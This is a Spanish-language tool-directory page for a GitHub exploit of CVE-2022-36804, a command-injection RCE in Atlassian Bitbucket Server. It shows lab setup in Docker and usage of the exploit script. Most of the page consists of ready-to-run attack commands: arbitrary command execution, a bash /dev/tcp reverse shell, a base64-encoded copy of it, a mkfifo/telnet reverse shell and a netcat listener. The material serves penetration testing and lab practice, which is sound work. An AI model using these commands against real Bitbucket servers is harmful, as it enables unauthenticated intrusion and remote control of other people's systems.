Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2022-36804 — Se encontró una vulnerabilidad crítica de inyección de comandos en múltiples endpoints de API de Atlassian Bitbucket Server y Data Center. Esta vulnerabilidad afecta a todas las versiones de Bitbucket Server y Data Center publicadas antes de las versiones <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 y <8.3.1 | Kitploit
Herramientas/GitHubGitHub/walnutsecurity/cve-2022-36804
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlLabs y Práctica
GitHubwalnutsecurity/cve-2022-36804

cve-2022-36804

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

84hace 3 añosAún no revisado

Se encontró una vulnerabilidad crítica de inyección de comandos en múltiples endpoints de API de Atlassian Bitbucket Server y Data Center. Esta vulnerabilidad afecta a todas las versiones de Bitbucket Server y Data Center publicadas antes de las versiones <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 y <8.3.1

Compartir

CVE-2022-36804: RCE sin autenticación en Atlassian Bitbucket Server

Se encontró una vulnerabilidad crítica de inyección de comandos en múltiples endpoints de API de Atlassian Bitbucket Server y Data Center. Esta vulnerabilidad afecta a todas las versiones de Bitbucket Server y Data Center lanzadas antes de las versiones <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 y <8.3.1

Laboratorio para CVE-2022-36804

Construir Docker

root@kitploit:~
docker build -t bitbucket .

Ejecutar Docker

root@kitploit:~
docker run -it bitbucket

Uso de cve-2022-36804.py

Verificar ejecución remota de código (RCE)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990

Verificar RCE con comando personalizado (cmd)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id

Verificar RCE con comando personalizado, clave de proyecto y nombre de repositorio

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo

Verificar repositorio privado

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074C8FFA5D13088332C8DF0CD8A7CE7

Obtener shell con netcat

Reemplaza 172.17.0.3 con tu dirección IP local

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"

Inicia el listener de netcat con:

root@kitploit:~
nc -lvp 4444

Convierte /bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1 a base64 en caso de error de ejecución del payload.

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"

Si aún enfrentas algún error, ejecuta el siguiente comando:

TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"

Se recomienda instalar una versión vulnerable de Bitbucket Server en una máquina Windows/Linux para practicar. Será más fácil lograr una reverse shell en comparación con las imágenes de Docker.

Se puede encontrar más información aquí

Referencias

  • https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
  • https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
Descargar herramienta